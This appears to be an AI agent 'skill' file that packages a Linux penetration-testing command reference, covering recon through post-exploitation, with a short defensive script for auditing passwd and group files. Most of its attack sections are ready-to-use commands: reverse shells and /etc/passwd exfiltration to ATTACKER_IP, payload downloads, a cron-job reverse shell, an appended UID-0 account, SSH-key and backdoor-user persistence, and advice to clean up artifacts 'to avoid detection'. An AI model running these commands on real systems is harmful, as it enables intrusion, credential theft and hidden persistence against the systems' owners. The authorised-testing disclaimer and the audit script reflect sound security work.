Practical Linux command reference for penetration testing including recon, enumeration, exploitation, privilege escalation, and post-exploitation techniques.
---
name: linux-pentesting-command-reference
description: Practical Linux command reference for penetration testing covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation phases.
triggers:
- how do I enumerate services on a linux target
- show me privilege escalation commands for pentesting
- what reconnaissance commands should I use on linux
- help me with linux exploitation techniques
- what are common post-exploitation commands
- show me pentesting enumeration commands for linux
- how to perform local recon on a compromised linux system
- what commands help with linux privilege escalation
---
# Linux Pentesting Command Reference
> Skill by [ara.so](https://ara.so) — Security Skills collection.
## Overview
The **Linux for a Pentester** project is a curated collection of practical Linux commands and techniques organized by penetration testing phases. This reference is built from real-world labs, CTFs, and hands-on practice, focusing on actionable commands rather than theory. It covers the complete pentesting workflow from initial reconnaissance through post-exploitation.
## Repository Structure
The notes are organized into six main modules:
- **00-General-Commands**: Essential Linux survival commands for daily usage
- **01-Recon**: Local and network reconnaissance techniques
- **02-Enumeration**: Deep service and user data enumeration
- **03-Exploitation**: Shell access, file uploads, and initial foothold techniques
- **04-Privilege-Escalation**: Techniques for escalating to root privileges
- **05-Post-Exploitation**: Persistence, cleanup, and lateral movement
- **Cheatsheets**: Quick reference one-liners
## Installation
Clone the repository to have offline access during engagements:
```bash
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
```
For quick reference during testing:
```bash
# View specific module
cat 04-Privilege-Escalation/README.md
# Search for specific commands
grep -r "sudo" .
# Find all references to a specific tool
find . -type f -name "*.md" -exec grep -l "nmap" {} \;
```
## Key Command Categories
### General Commands (Module 00)
Essential commands for navigation and system interaction:
```bash
# File system navigation
ls -la # List all files including hidden
cd /path/to/directory # Change directory
pwd # Print working directory
find / -name "*.conf" 2>/dev/null # Find config files, suppress errors
# File operations
cat /etc/passwd # View file contents
less /var/log/syslog # Page through large files
grep -r "password" . # Recursive search
tail -f /var/log/auth.log # Follow log file in real-time
# System information
uname -a # Kernel and system info
whoami # Current user
id # User and group IDs
hostname # System hostname
```
### Reconnaissance (Module 01)
Local and network reconnaissance commands:
```bash
# Network enumeration
ip a # Show network interfaces
ss -tulpn # Show listening ports (modern netstat)
netstat -ano # Show all network connections
arp -a # Show ARP cache
# System enumeration
ps aux # List all running processes
systemctl list-units # List systemd services
cat /etc/issue # OS version info
cat /etc/*-release # Distribution info
lsb_release -a # Detailed OS info
# User enumeration
cat /etc/passwd # List all users
cat /etc/group # List all groups
w # Who is logged in
last # Last logged in users
lastlog # All users last login
```
### Enumeration (Module 02)
Deep service and data enumeration:
```bash
# File system enumeration
find / -perm -4000 2>/dev/null # Find SUID binaries
find / -writable -type d 2>/dev/null # Find writable directories
find / -name "*.conf" -o -name "*.config" 2>/dev/null # Find configs
# Capability enumeration
getcap -r / 2>/dev/null # Find files with capabilities
# Cron job enumeration
cat /etc/crontab
ls -la /etc/cron.*
crontab -l # Current user's crontab
# Service enumeration
systemctl list-unit-files --state=enabled
ps -U root -u root u # Root processes (ps filter, so grep's own command line does not match)
# Database files
locate password | grep -i config
find / -name "*.db" 2>/dev/null
find / -name "*.sqlite" 2>/dev/null
```
### Exploitation (Module 03)
Common exploitation techniques and payloads:
```bash
# Reverse shells
bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1
nc ATTACKER_IP PORT -e /bin/bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# TTY shell upgrade
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then: Ctrl+Z, stty raw -echo; fg, export TERM=xterm
# File transfer
# On attacker: python3 -m http.server 8000
wget http://ATTACKER_IP:8000/file -O /tmp/file
curl http://ATTACKER_IP:8000/file -o /tmp/file
# Data exfiltration
cat /etc/passwd | nc ATTACKER_IP PORT
curl -X POST -d @/etc/passwd http://ATTACKER_IP:PORT/
```
### Privilege Escalation (Module 04)
Techniques for escalating privileges:
```bash
# SUID exploitation
find / -perm -4000 -type f 2>/dev/null
# Check GTFOBins for SUID binary exploits
# Sudo exploitation
sudo -l # List sudo privileges
sudo -l -U username # Check other user's sudo rights
# Writable /etc/passwd exploitation
openssl passwd -1 -salt salt password123
echo 'newroot:HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
# Cron job abuse
# Write malicious script to writable cron job path
echo 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' > /path/to/cronjob.sh
chmod +x /path/to/cronjob.sh
# PATH hijacking
echo '/bin/bash' > /tmp/vulnerable_binary
chmod +x /tmp/vulnerable_binary
export PATH=/tmp:$PATH
# Kernel exploits (check kernel version first)
uname -a
# Search for kernel exploits on exploit-db or searchsploit
searchsploit linux kernel 4.15
# Capabilities abuse
# If python has cap_setuid+ep
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
```
### Post-Exploitation (Module 05)
Persistence and lateral movement:
```bash
# Add SSH key for persistence
mkdir -p /root/.ssh
echo "YOUR_PUBLIC_KEY" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# Add backdoor user
useradd -m -s /bin/bash backdoor
echo "backdoor:password" | chpasswd
usermod -aG sudo backdoor
# Download enumeration scripts
wget http://ATTACKER_IP/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh # Absolute path: the file was saved to /tmp above
# Credential harvesting
grep -r "password" /home/ 2>/dev/null
cat ~/.bash_history
cat ~/.mysql_history
find / -name "*.conf" -exec grep -i "pass" {} \; 2>/dev/null
# Lateral movement preparation
hostname -I # Get all IPs
for i in {1..254}; do ping -c 1 192.168.1.$i & done # Ping sweep
```
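Both the writable-/etc/passwd trick in Module 04 (an appended UID-0 line) and the backdoor user in Module 05 (a new sudo member with a login shell) leave artifacts in /etc/passwd and /etc/group that a defender or a tester writing the clean-up report can audit for. The script below is an added example, not code from the Linux-for-a-Pentester repo; the passwd and group files are constructed samples, and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the repo): audit passwd/group files for the
# artifacts left by "extra UID-0 account" and "backdoor sudo user".
# Sample files are constructed here; pass the real /etc/passwd and
# /etc/group to the functions when auditing a host.

# Every account with UID 0 other than root (rogue root accounts).
extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Members of the sudo and wheel groups, one per line.
sudo_members() {
    awk -F: '($1 == "sudo" || $1 == "wheel") && $4 != "" {
                 n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i] }' "$1"
}

# Accounts that can actually log in (shell is not nologin/false).
shell_accounts() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

# Constructed sample data: a normal system plus one backdoor user and one
# appended UID-0 account with a placeholder hash.
SAMPLE_PASSWD=$(mktemp)
SAMPLE_GROUP=$(mktemp)
trap 'rm -f "$SAMPLE_PASSWD" "$SAMPLE_GROUP"' EXIT
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backdoor:x:1001:1001::/home/backdoor:/bin/bash
newroot:$1$salt$placeholderhash:0:0:root:/root:/bin/bash
EOF
cat > "$SAMPLE_GROUP" <<'EOF'
root:x:0:
sudo:x:27:alice,backdoor
users:x:100:
EOF

echo "UID-0 accounts besides root:"; extra_uid0 "$SAMPLE_PASSWD"
echo "sudo/wheel members:";          sudo_members "$SAMPLE_GROUP"
echo "accounts with a login shell:"; shell_accounts "$SAMPLE_PASSWD"
```

On a real host, diff the three lists against a known-good baseline taken before the engagement; any new name is either an artifact to clean up or a finding to report.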
## Common Patterns
### Initial Access Workflow
```bash
# 1. Stabilize shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# Ctrl+Z
stty raw -echo; fg
# 2. Basic enumeration
id && hostname && uname -a
cat /etc/passwd | grep -v nologin
sudo -l
# 3. Transfer enumeration script
wget http://ATTACKER_IP:8000/linpeas.sh -O /tmp/lp.sh && chmod +x /tmp/lp.sh
```
### Privilege Escalation Checklist
```bash
# Check sudo
sudo -l
# Check SUID
find / -perm -4000 -type f 2>/dev/null
# Check capabilities
getcap -r / 2>/dev/null
# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
# Check writable paths
find / -writable -type d 2>/dev/null | grep -v proc
# Check for credentials
grep -r "password" /home/ 2>/dev/null
find / -name "*.conf" -type f -exec grep -i "pass" {} + 2>/dev/null
```
## Troubleshooting
### Shell Issues
**Problem**: Unstable or non-interactive shell
```bash
# Try multiple TTY upgrade methods
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
perl -e 'exec "/bin/bash";'
script -qc /bin/bash /dev/null
```
**Problem**: Commands not working in reverse shell
```bash
# Set proper PATH
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export SHELL=/bin/bash
export TERM=xterm-256color
```
### File Transfer Issues
**Problem**: wget/curl not available
```bash
# Try alternative methods
# Using netcat
nc ATTACKER_IP PORT < file # Send
nc -lvp PORT > file # Receive
# Using base64
base64 file | nc ATTACKER_IP PORT # Send
nc -lvp PORT | base64 -d > file # Receive
# Using scp (if SSH available)
scp file user@ATTACKER_IP:/path/
```
### Permission Issues
**Problem**: Cannot write to common directories
```bash
# Find writable locations
find / -writable -type d 2>/dev/null | grep -v proc
# Common writable: /tmp, /var/tmp, /dev/shm
# Check /tmp alternatives
ls -la /dev/shm
ls -la /var/tmp
```
### Enumeration Script Failures
**Problem**: Automated scripts not running
```bash
# Check script requirements
file linpeas.sh # Verify file type
head -1 linpeas.sh # Check shebang
which bash # Verify interpreter exists
# Run with explicit interpreter
bash linpeas.sh
sh linpeas.sh
```
## Integration with AI Agents
When assisting with pentesting tasks, reference specific modules:
```bash
# For recon phase
cat Linux-for-a-Pentester/01-Recon/network-enumeration.md
# For privilege escalation
grep -r "sudo" Linux-for-a-Pentester/04-Privilege-Escalation/
# For specific techniques
find Linux-for-a-Pentester -name "*suid*"
```
## Best Practices
1. **Always stabilize your shell first** before running complex commands
2. **Use 2>/dev/null** to suppress error messages in enumeration commands
3. **Check sudo -l** as the first privilege escalation check
4. **Transfer and run automated enumeration scripts** (LinPEAS, LinEnum) for comprehensive coverage
5. **Document discovered credentials** and file paths for later reference
6. **Clean up artifacts** during post-exploitation to avoid detection
## Legal Disclaimer
These commands and techniques are for **authorized penetration testing and educational purposes only**. Always ensure you have explicit written permission before testing any system you do not own.
Creator's repository · aradotso/security-skills